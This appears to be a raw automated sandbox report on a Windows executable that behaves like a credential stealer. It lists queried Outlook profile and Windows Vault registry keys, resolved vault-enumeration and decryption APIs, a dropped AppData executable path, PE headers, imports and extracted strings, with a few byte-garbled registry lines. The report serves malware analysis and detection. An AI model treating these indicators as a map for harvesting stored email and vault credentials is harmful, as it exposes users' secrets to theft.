HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9b\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x98\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xd0\x9c\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
\xea\xa7\x80\xc9\x90EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
C:\Windows\system32\lsass.exe
56BC56B24CFE6F2024462707
VaultSvc

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00482cf0
Reported Checksum 0x00000000
Actual Checksum 0x000d66e5
Minimum OS Version 4.0
Compile Time 1992-05-14 01:02:16
Import Hash 5b5db1d2ae3530a881a13aa0779c42ea

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00001000 0x00081d38 0x00081e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.51
DATA 0x00083000 0x0000f6c8 0x0000f800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 6.59
BSS 0x00093000 0x00000ead 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x00094000 0x00002442 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.82
.tls 0x00097000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x00098000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.21
.reloc 0x00099000 0x00009848 0x00009a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.62
.rsrc 0x000a3000 0x000329bc 0x00032a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.95

Imports

Library kernel32.dll:
0x49413c VirtualFree
0x494140 VirtualAlloc
0x494144 LocalFree
0x494148 LocalAlloc
0x49414c GetTickCount
0x494154 GetVersion
0x494158 GetCurrentThreadId
0x494164 VirtualQuery
0x494168 WideCharToMultiByte
0x49416c MultiByteToWideChar
0x494170 lstrlenA
0x494174 lstrcpynA
0x494178 LoadLibraryExA
0x49417c GetThreadLocale
0x494180 GetStartupInfoA
0x494184 GetProcAddress
0x494188 GetModuleHandleA
0x49418c GetModuleFileNameA
0x494190 GetLocaleInfoA
0x494194 GetCommandLineA
0x494198 FreeLibrary
0x49419c FindFirstFileA
0x4941a0 FindClose
0x4941a4 ExitProcess
0x4941a8 WriteFile
0x4941b0 RtlUnwind
0x4941b4 RaiseException
0x4941b8 GetStdHandle
Library user32.dll:
0x4941c0 GetKeyboardType
0x4941c4 LoadStringA
0x4941c8 MessageBoxA
0x4941cc CharNextA
Library advapi32.dll:
0x4941d4 RegQueryValueExA
0x4941d8 RegOpenKeyExA
0x4941dc RegCloseKey
Library oleaut32.dll:
0x4941e4 SysFreeString
0x4941e8 SysReAllocStringLen
0x4941ec SysAllocStringLen
Library kernel32.dll:
0x4941f4 TlsSetValue
0x4941f8 TlsGetValue
0x4941fc LocalAlloc
0x494200 GetModuleHandleA
Library advapi32.dll:
0x494208 RegQueryValueExA
0x49420c RegOpenKeyExA
0x494210 RegCloseKey
Library kernel32.dll:
0x494218 lstrcpyA
0x49421c WriteFile
0x494220 WaitForSingleObject
0x494224 VirtualQuery
0x494228 VirtualAlloc
0x49422c Sleep
0x494230 SizeofResource
0x494234 SetThreadLocale
0x494238 SetFilePointer
0x49423c SetEvent
0x494240 SetErrorMode
0x494244 SetEndOfFile
0x494248 ResetEvent
0x49424c ReadFile
0x494250 MulDiv
0x494254 LockResource
0x494258 LoadResource
0x49425c LoadLibraryA
0x494268 GlobalUnlock
0x49426c GlobalReAlloc
0x494270 GlobalHandle
0x494274 GlobalLock
0x494278 GlobalFree
0x49427c GlobalFindAtomA
0x494280 GlobalDeleteAtom
0x494284 GlobalAlloc
0x494288 GlobalAddAtomA
0x49428c GetVersionExA
0x494290 GetVersion
0x494294 GetTickCount
0x494298 GetThreadLocale
0x49429c GetTempPathA
0x4942a0 GetSystemInfo
0x4942a4 GetStringTypeExA
0x4942a8 GetStdHandle
0x4942ac GetProcAddress
0x4942b0 GetModuleHandleA
0x4942b4 GetModuleFileNameA
0x4942b8 GetLocaleInfoA
0x4942bc GetLocalTime
0x4942c0 GetLastError
0x4942c4 GetFullPathNameA
0x4942c8 GetFileSize
0x4942cc GetFileAttributesA
0x4942d0 GetDiskFreeSpaceA
0x4942d4 GetDateFormatA
0x4942d8 GetCurrentThreadId
0x4942dc GetCurrentProcessId
0x4942e0 GetCPInfo
0x4942e4 GetACP
0x4942e8 FreeResource
0x4942ec InterlockedExchange
0x4942f0 FreeLibrary
0x4942f4 FormatMessageA
0x4942f8 FindResourceA
0x4942fc FindFirstFileA
0x494300 FindClose
0x49430c ExitProcess
0x494310 EnumCalendarInfoA
0x49431c CreateThread
0x494320 CreateFileA
0x494324 CreateEventA
0x494328 CompareStringA
0x49432c CloseHandle
Library version.dll:
0x494334 VerQueryValueA
0x49433c GetFileVersionInfoA
Library gdi32.dll:
0x494344 UnrealizeObject
0x494348 TextOutA
0x49434c StretchBlt
0x494350 SetWindowOrgEx
0x494354 SetWinMetaFileBits
0x494358 SetViewportOrgEx
0x49435c SetTextColor
0x494360 SetTextAlign
0x494364 SetStretchBltMode
0x494368 SetROP2
0x49436c SetPixel
0x494370 SetEnhMetaFileBits
0x494374 SetDIBColorTable
0x494378 SetBrushOrgEx
0x49437c SetBkMode
0x494380 SetBkColor
0x494384 SelectPalette
0x494388 SelectObject
0x49438c SelectClipRgn
0x494390 ScaleWindowExtEx
0x494394 SaveDC
0x494398 RoundRect
0x49439c RestoreDC
0x4943a0 Rectangle
0x4943a4 RectVisible
0x4943a8 RealizePalette
0x4943ac Polyline
0x4943b0 Polygon
0x4943b4 PlayEnhMetaFile
0x4943b8 Pie
0x4943bc PatBlt
0x4943c0 MoveToEx
0x4943c4 MaskBlt
0x4943c8 LineTo
0x4943cc LPtoDP
0x4943d0 IntersectClipRect
0x4943d4 GetWindowOrgEx
0x4943d8 GetWinMetaFileBits
0x4943dc GetTextMetricsA
0x4943e4 GetTextAlign
0x4943ec GetStockObject
0x4943f0 GetPixel
0x4943f4 GetPaletteEntries
0x4943f8 GetObjectA
0x494404 GetEnhMetaFileBits
0x494408 GetDeviceCaps
0x49440c GetDIBits
0x494410 GetDIBColorTable
0x494414 GetDCOrgEx
0x49441c GetClipBox
0x494420 GetBrushOrgEx
0x494424 GetBkMode
0x494428 GetBkColor
0x49442c GetBitmapBits
0x494430 ExtTextOutA
0x494434 ExtSelectClipRgn
0x494438 ExtCreatePen
0x49443c ExcludeClipRect
0x494440 Ellipse
0x494444 DeleteObject
0x494448 DeleteEnhMetaFile
0x49444c DeleteDC
0x494450 CreateSolidBrush
0x494454 CreateRectRgn
0x494458 CreatePolygonRgn
0x49445c CreatePenIndirect
0x494460 CreatePalette
0x494468 CreateFontIndirectA
0x49446c CreateDIBitmap
0x494470 CreateDIBSection
0x494474 CreateCompatibleDC
0x49447c CreateBrushIndirect
0x494480 CreateBitmap
0x494484 CopyEnhMetaFileA
0x494488 BitBlt
0x49448c Arc
Library user32.dll:
0x494494 CreateWindowExA
0x494498 WindowFromPoint
0x49449c WinHelpA
0x4944a0 WaitMessage
0x4944a4 UpdateWindow
0x4944a8 UnregisterClassA
0x4944ac UnhookWindowsHookEx
0x4944b0 TranslateMessage
0x4944b8 TrackPopupMenu
0x4944c0 ShowWindow
0x4944c4 ShowScrollBar
0x4944c8 ShowOwnedPopups
0x4944cc ShowCursor
0x4944d0 SetWindowsHookExA
0x4944d4 SetWindowTextA
0x4944d8 SetWindowPos
0x4944dc SetWindowPlacement
0x4944e0 SetWindowLongA
0x4944e4 SetTimer
0x4944e8 SetScrollRange
0x4944ec SetScrollPos
0x4944f0 SetScrollInfo
0x4944f4 SetRect
0x4944f8 SetPropA
0x4944fc SetParent
0x494500 SetMenuItemInfoA
0x494504 SetMenu
0x494508 SetKeyboardState
0x49450c SetForegroundWindow
0x494510 SetFocus
0x494514 SetCursor
0x494518 SetClipboardData
0x49451c SetClassLongA
0x494520 SetCapture
0x494524 SetActiveWindow
0x494528 SendMessageA
0x49452c ScrollWindow
0x494530 ScreenToClient
0x494534 RemovePropA
0x494538 RemoveMenu
0x49453c ReleaseDC
0x494540 ReleaseCapture
0x49454c RegisterClassA
0x494550 RedrawWindow
0x494554 PtInRect
0x494558 PostQuitMessage
0x49455c PostMessageA
0x494560 PeekMessageA
0x494564 OpenClipboard
0x494568 OffsetRect
0x49456c OemToCharA
0x494570 MessageBoxA
0x494574 MessageBeep
0x494578 MapWindowPoints
0x49457c MapVirtualKeyA
0x494580 LoadStringA
0x494584 LoadKeyboardLayoutA
0x494588 LoadIconA
0x49458c LoadCursorA
0x494590 LoadBitmapA
0x494594 KillTimer
0x494598 IsZoomed
0x49459c IsWindowVisible
0x4945a0 IsWindowEnabled
0x4945a4 IsWindow
0x4945a8 IsRectEmpty
0x4945ac IsIconic
0x4945b0 IsDialogMessageA
0x4945b4 IsChild
0x4945b8 IsCharAlphaNumericA
0x4945bc IsCharAlphaA
0x4945c0 InvalidateRect
0x4945c4 IntersectRect
0x4945c8 InsertMenuItemA
0x4945cc InsertMenuA
0x4945d0 InflateRect
0x4945d8 GetWindowTextA
0x4945dc GetWindowRect
0x4945e0 GetWindowPlacement
0x4945e4 GetWindowLongA
0x4945e8 GetWindowDC
0x4945ec GetTopWindow
0x4945f0 GetSystemMetrics
0x4945f4 GetSystemMenu
0x4945f8 GetSysColorBrush
0x4945fc GetSysColor
0x494600 GetSubMenu
0x494604 GetScrollRange
0x494608 GetScrollPos
0x49460c GetScrollInfo
0x494610 GetPropA
0x494614 GetParent
0x494618 GetWindow
0x49461c GetMenuStringA
0x494620 GetMenuState
0x494624 GetMenuItemInfoA
0x494628 GetMenuItemID
0x49462c GetMenuItemCount
0x494630 GetMenu
0x494634 GetLastActivePopup
0x494638 GetKeyboardState
0x494640 GetKeyboardLayout
0x494644 GetKeyState
0x494648 GetKeyNameTextA
0x49464c GetIconInfo
0x494650 GetForegroundWindow
0x494654 GetFocus
0x494658 GetDlgItem
0x49465c GetDesktopWindow
0x494660 GetDCEx
0x494664 GetDC
0x494668 GetCursorPos
0x49466c GetCursor
0x494670 GetClipboardData
0x494674 GetClientRect
0x494678 GetClassNameA
0x49467c GetClassInfoA
0x494680 GetCapture
0x494684 GetActiveWindow
0x494688 FrameRect
0x49468c FindWindowA
0x494690 FillRect
0x494694 EqualRect
0x494698 EnumWindows
0x49469c EnumThreadWindows
0x4946a4 EndPaint
0x4946a8 EnableWindow
0x4946ac EnableScrollBar
0x4946b0 EnableMenuItem
0x4946b4 EmptyClipboard
0x4946b8 DrawTextA
0x4946bc DrawMenuBar
0x4946c0 DrawIconEx
0x4946c4 DrawIcon
0x4946c8 DrawFrameControl
0x4946cc DrawFocusRect
0x4946d0 DrawEdge
0x4946d4 DispatchMessageA
0x4946d8 DestroyWindow
0x4946dc DestroyMenu
0x4946e0 DestroyIcon
0x4946e4 DestroyCursor
0x4946e8 DeleteMenu
0x4946ec DefWindowProcA
0x4946f0 DefMDIChildProcA
0x4946f4 DefFrameProcA
0x4946f8 CreatePopupMenu
0x4946fc CreateMenu
0x494700 CreateIcon
0x494704 CloseClipboard
0x494708 ClientToScreen
0x49470c CheckMenuItem
0x494710 CallWindowProcA
0x494714 CallNextHookEx
0x494718 BeginPaint
0x49471c CharNextA
0x494720 CharLowerBuffA
0x494724 CharLowerA
0x494728 CharUpperBuffA
0x49472c CharToOemA
0x494730 AdjustWindowRectEx
Library kernel32.dll:
0x49473c Sleep
Library oleaut32.dll:
0x494744 SafeArrayPtrOfIndex
0x494748 SafeArrayGetUBound
0x49474c SafeArrayGetLBound
0x494750 SafeArrayCreate
0x494754 VariantChangeType
0x494758 VariantCopy
0x49475c VariantClear
0x494760 VariantInit
Library comctl32.dll:
0x494770 ImageList_Write
0x494774 ImageList_Read
0x494784 ImageList_DragMove
0x494788 ImageList_DragLeave
0x49478c ImageList_DragEnter
0x494790 ImageList_EndDrag
0x494794 ImageList_BeginDrag
0x494798 ImageList_Remove
0x49479c ImageList_DrawEx
0x4947a0 ImageList_Replace
0x4947a4 ImageList_Draw
0x4947b4 ImageList_Add
0x4947bc ImageList_Destroy
0x4947c0 ImageList_Create
0x4947c4 InitCommonControls
Library comdlg32.dll:
0x4947cc ChooseColorA
0x4947d0 GetSaveFileNameA
0x4947d4 GetOpenFileNameA

`DATA
.idata
.rdata
P.reloc
P.rsrc
System
IInterface
Uh*$@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
Uh 3@
Ph`7@
Uhf<@
t@h0R@
kernel32.dll
GetLongPathNameA
UhIS@
Software\Borland\Locales
Software\Borland\Delphi\Locales
UhxV@
UhGZ@
Uh;[@
Uh^\@
Uhi^@
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
False
AM/PM
D$LPj
WUWSj
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
Variants
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
String
Array
ByRef
t~h$8I
False
TNotifyEvent
TObject
Classes
Classes
TInterfacedPersistent$ A
Classes
Classes
Classes
TFileStreamx$A
Classes
UhV8A
Uhj9A
Uhb:A
Uh\=A
UhRDA
UhKEA
UhGKA
Uh*KA
Strings
UhUMA
Uh5OA
UhOPA
UhpQA
UhGRA
Uh]TA
Uh@TA
UhHUA
Uh#UA
UhDWA
Uh'WA
UhvXA
Uh9eA
UhchA
UhRlA
Owner
UhnnA
UhOnA
Uh7oA
UhRyA
Uh&yA
Uho|A
UhW}A
Uh.~A
False
%s_%d
ulj@h
TPUtilWindow
Graphics
TProgressEvent
TObject
TProgressStage
String
Graphics
Graphics
Graphics
Graphics
Graphics
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
